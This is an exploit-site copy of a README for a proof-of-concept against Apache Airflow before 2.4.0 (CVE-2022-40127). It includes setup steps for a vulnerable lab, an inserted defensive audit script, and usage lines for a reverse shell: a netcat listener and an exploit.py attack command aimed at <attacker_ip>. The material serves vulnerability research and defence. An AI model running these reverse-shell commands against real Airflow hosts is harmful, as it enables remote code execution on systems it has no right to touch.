## https://sploitus.com/exploit?id=9701ED09-B3DD-5E5B-A2B5-CFB714A7E23B
# Apache Airflow < 2.4.0 RCE (CVE-2022-40127)
**PoC for CVE-2022-40127 that is an Apache Airflow RCE vulnerability affecting versions prior to 2.4.0.**
The <a href="https://vulners.com/cve/CVE-2022-40127" target="_blank">official report description</a> says:
> A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.
This repo was created for a CVE analysis blog post published on the <a href="https://www.vicarius.io/vsociety/" target="_blank">vsociety blog</a>.
https://github.com/jakabakos/CVE-2022-40127/assets/42498816/2094f2ec-f074-41e6-99f4-f9f77dd09df6
## Usage
You can clone the repo:
```bash
git clone https://github.com/jakabakos/CVE-2022-40127.git
```
## Install and run Airflow v2.3.4
### Via docker-compose
Download the docker-compose file from the official Airflow docs:
```bash
cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
```
Run Airflow:
```bash
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up
open localhost:8080
```
In this case both the username and the password are `airflow`.
### Manually
Based on the <a href="https://airflow.apache.org/docs/apache-airflow/2.3.4/installation/installing-from-pypi.html" target="_blank">official install instructions</a>:
```bash
pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.7.txt"
```
You can verify that the installation succeeded with `which airflow` and/or `airflow info`.
Run Airflow:
```bash
airflow standalone
```
The generated username and password are printed in the logs.
## Using the exploit
First, install the required packages with pip:
```bash
pip3 install -r requirements.txt
```
See the possible options with:
```bash
python3 exploit.py --help
```
You can check whether the host is exploitable without triggering the payload:
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080
```
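A defender-side counterpart to this check, added here and not part of the repo's `exploit.py`: from data an operator can pull over the Airflow REST API it decides whether the reported version predates the 2.4.0 fix, lists which example DAGs are still loaded, and flags manually triggered runs whose `run_id` carries shell metacharacters. The response shapes (`version`, `dags`, `dag_runs`) and the metacharacter heuristic are assumptions about the Airflow 2.x stable REST API, and the sample responses below are constructed, not captured.

```python
"""CVE-2022-40127 exposure check (added example, not the repo's own code).

Assumed Airflow 2.x stable REST API shapes:
  GET /api/v1/version             -> {"version": "2.3.4", ...}
  GET /api/v1/dags?tags=example   -> {"dags": [{"dag_id": ..., "is_paused": ...}]}
  GET /api/v1/dags/<id>/dagRuns   -> {"dag_runs": [{"run_id": ..., "run_type": ...}]}
"""
import re

FIXED_VERSION = (2, 4, 0)
# Heuristic (assumption): Airflow-generated run_ids look like
# "manual__2022-..." or "scheduled__2022-...", so shell metacharacters
# in a manual run_id point at someone typing one by hand.
SHELL_META = re.compile(r"[;&|`$<>(){}\n]")


def parse_version(version: str) -> tuple:
    """'2.3.4' -> (2, 3, 4); a pre-release suffix such as '2.3.4rc1' is ignored."""
    nums = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not nums:
        raise ValueError(f"unrecognised Airflow version string: {version!r}")
    return tuple(int(n) for n in nums.groups())


def is_affected(version: str) -> bool:
    """True when the reported version is older than the 2.4.0 fix."""
    return parse_version(version) < FIXED_VERSION


def loaded_example_dags(dags_json: dict) -> list:
    """dag_ids of example DAGs present in the metadata DB, paused or not."""
    return sorted(d["dag_id"] for d in dags_json.get("dags", []))


def suspicious_runs(dag_runs_json: dict) -> list:
    """run_ids of manual runs that contain shell metacharacters."""
    return [run.get("run_id", "") for run in dag_runs_json.get("dag_runs", [])
            if run.get("run_type") == "manual" and SHELL_META.search(run.get("run_id", ""))]


# Constructed sample responses in the assumed API shape (not real captures).
SAMPLE_VERSION = {"version": "2.3.4"}
SAMPLE_DAGS = {"dags": [{"dag_id": "example_bash_operator", "is_paused": True}]}
SAMPLE_RUNS = {"dag_runs": [
    {"run_id": "scheduled__2022-11-01T00:00:00+00:00", "run_type": "scheduled"},
    {"run_id": "manual__2022-11-02T10:00:00+00:00", "run_type": "manual"},
    {"run_id": "demo; echo test", "run_type": "manual"},
]}

if __name__ == "__main__":
    print("affected version:", is_affected(SAMPLE_VERSION["version"]))
    print("example DAGs loaded:", loaded_example_dags(SAMPLE_DAGS))
    print("suspicious manual run_ids:", suspicious_runs(SAMPLE_RUNS))
```

Feeding the three functions the live JSON from an authenticated GET to the endpoints named in the docstring turns this into a quick audit of an instance; a paused example DAG still counts, since a user with trigger rights can unpause it.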
Set up a local listener for the reverse shell in a different terminal session:
```bash
nc -lvnp 4242
```
Run the script in attack mode with this command:
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080 -a -host <attacker_ip> -port 4242
```
You should see the connection within a minute or so.
<img width="1549" alt="proof" src="https://github.com/jakabakos/CVE-2022-40127/assets/42498816/a80ff9ec-69a1-4b99-91ea-c244098ded80">